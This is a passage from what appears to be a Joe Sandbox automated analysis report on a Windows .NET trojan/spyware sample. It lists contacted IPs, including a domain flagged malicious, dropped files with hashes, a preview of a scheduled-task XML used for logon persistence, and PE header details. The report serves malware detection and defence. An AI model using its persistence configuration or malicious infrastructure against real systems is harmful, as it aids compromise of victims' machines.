                                          http://www.carterandcone.comlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deegSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comd&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.founder.com.cn/cnSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comoituSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/tSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cno.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/&-cSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/jp/--SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/_-lSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.comE.TTFSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://OPBeIPZ8XbJqLOvY6X.netnrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  3.232.242.170
                                                  		unknownUnited States
                                                  		14618AMAZON-AESUSfalse
                                                  111.118.212.38
                                                  		strictfacilityservices.comIndia
                                                  		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                  52.20.78.240
                                                  		api.ipify.org.herokudns.comUnited States
                                                  		14618AMAZON-AESUSfalse

                                                  General Information

                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                  Analysis ID:756116
                                                  Start date and time:2022-11-29 16:49:16 +01:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 47s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:19
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@16/5@8/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  16:50:37API Interceptor432x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe modified
                                                  16:50:45Task SchedulerRun new task: nrQtAokXKaSn path: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  16:51:22API Interceptor69x Sleep call for process: nrQtAokXKaSn.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nrQtAokXKaSn.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Local\Temp\tmp152E.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

                                                  C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1657
                                                  Entropy (8bit):5.1584897189168
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
                                                  MD5:03051B1F18A035DE03D059366AC0473E
                                                  SHA1:155345324D235531556DDFE9F16B9C056D4C9505
                                                  SHA-256:92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
                                                  SHA-512:1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

                                                  C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):847360
                                                  Entropy (8bit):7.451826150772928
                                                  Encrypted:false
                                                  SSDEEP:12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
                                                  MD5:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  SHA1:7505B261CC9DF8C6AB8F10E035CF8D8319043CDB
                                                  SHA-256:655B12A219D0F0E39A84FE44483E25411BE852CE2BB0D451A1CB1A9A670F70B8
                                                  SHA-512:245277E1F0F637BDA7E2B5D1F76AE06656AEB0A7DF47EB428EDF8C6472F9AF03580234B9CD4A95321A96E6511D9E75279C452C5B58AE182B060A6CA35949A77C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..............P.................. ... ....@.. .......................`............@.....................................K.... .......................@......[................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............................:..........................................Z(....8.....(....8....*.&~.......*...~....*.b(....8......(....8.....*...&~.......*...~....*..0..~.......8O.......E....$...8....s.........8....s.........8)...*s.........8....s.........8....(....8....s......... .....:....& ....8.......0...........~....o......8......*8....8......0..$.......8....8....8......*.~....o......8.....0...........~....o......8....8....8......*..0...........~....o......8....8....8....

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.451826150772928
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  File size:847360
                                                  MD5:fe1aa7fa995970ebb34465d5dc0d8ce1
                                                  SHA1:7505b261cc9df8c6ab8f10e035cf8d8319043cdb
                                                  SHA256:655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
                                                  SHA512:245277e1f0f637bda7e2b5d1f76ae06656aeb0a7df47eb428edf8c6472f9af03580234b9cd4a95321a96e6511d9e75279c452c5b58ae182b060a6ca35949a77c
                                                  SSDEEP:12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
                                                  TLSH:B0057C9573728973F1CF01359095718C6EBCE543A2A6E2076FB63A8146027BFFA9CE41
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............P.................. ... ....@.. .......................`............@................................

                                                  File Icon

                                                  Icon Hash:00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4d02ee
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6385E21F [Tue Nov 29 10:42:39 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd02a00x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x5c8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xd025b0x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
